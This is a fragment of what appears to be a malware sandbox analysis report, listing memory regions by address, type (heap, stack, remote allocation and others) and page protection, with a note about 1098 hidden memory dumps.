heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4F39000
|
heap
|
page read and write
|
||
|
27D86D77000
|
heap
|
page read and write
|
||
|
27D86BF1000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
27D86D62000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
45CC000
|
remote allocation
|
page execute and read and write
|
||
|
50EF000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2E0F000
|
stack
|
page read and write
|
||
|
4EF5000
|
heap
|
page read and write
|
||
|
27D86BC1000
|
heap
|
page read and write
|
||
|
4A4F000
|
stack
|
page read and write
|
||
|
34F7000
|
heap
|
page read and write
|
||
|
26CD84EC000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page readonly
|
||
|
27D850A8000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
68BD000
|
stack
|
page read and write
|
||
|
6C5E000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
979000
|
stack
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
A96C000
|
direct allocation
|
page execute and read and write
|
||
|
224B7000
|
heap
|
page read and write
|
||
|
55071FF000
|
stack
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
27D86D92000
|
heap
|
page read and write
|
||
|
52C1000
|
heap
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
27D86CE8000
|
heap
|
page read and write
|
||
|
26CD4B10000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
28AB000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
BCC000
|
stack
|
page read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
26CD65C0000
|
heap
|
page read and write
|
||
|
65E0000
|
heap
|
page read and write
|
||
|
27D86D2F000
|
heap
|
page read and write
|
||
|
27D84DDB000
|
heap
|
page read and write
|
||
|
26C9000
|
trusted library allocation
|
page read and write
|
||
|
27D84C60000
|
heap
|
page read and write
|
||
|
158000
|
stack
|
page read and write
|
||
|
26CD67F9000
|
trusted library allocation
|
page read and write
|
||
|
4CCF000
|
heap
|
page read and write
|
||
|
21C1E000
|
stack
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
26CD6E05000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
665F000
|
heap
|
page read and write
|
||
|
26CD4AA7000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
224C9000
|
heap
|
page read and write
|
||
|
26CEED8B000
|
heap
|
page read and write
|
||
|
27D86BCC000
|
heap
|
page read and write
|
||
|
27D86E63000
|
heap
|
page read and write
|
||
|
26CD64D0000
|
trusted library allocation
|
page read and write
|
||
|
4CF5000
|
heap
|
page read and write
|
||
|
53B1000
|
heap
|
page read and write
|
||
|
23DE000
|
stack
|
page read and write
|
||
|
26CD4A59000
|
heap
|
page read and write
|
||
|
52C9000
|
heap
|
page read and write
|
||
|
8090000
|
direct allocation
|
page read and write
|
||
|
7EDC000
|
stack
|
page read and write
|
||
|
27D86E90000
|
heap
|
page read and write
|
||
|
224B5000
|
heap
|
page read and write
|
||
|
21B9F000
|
stack
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
There are 1098 hidden memdumps, click here to show them.